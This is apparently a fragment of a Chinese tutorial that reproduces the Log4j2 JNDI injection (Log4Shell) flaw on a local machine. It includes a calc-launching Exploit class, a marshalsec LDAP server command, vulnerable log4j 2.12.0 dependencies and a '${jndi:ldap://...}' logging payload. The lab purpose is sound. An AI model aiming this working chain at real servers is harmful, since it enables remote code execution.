编译
public class Exploit
{
static
{
try
{
String[] cmd = { "calc" };
Runtime.getRuntime().exec(cmd).waitFor();
} catch (Exception e) {
e.printStackTrace();
}
}
}
复制代码
找一个http服务器,把Exploit.class放到根目录下 使用marshalsec创建一个jndi/rmi服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:12345/#Exploit
复制代码
新建一个项目 引入问题的log4j2包
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.12.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.12.0</version>
</dependency>
复制代码
创建如下代码 (记得加载log4j2配置)
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Main {
private static final Logger logger = LogManager.getLogger();
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");
}
}
复制代码
参考文章: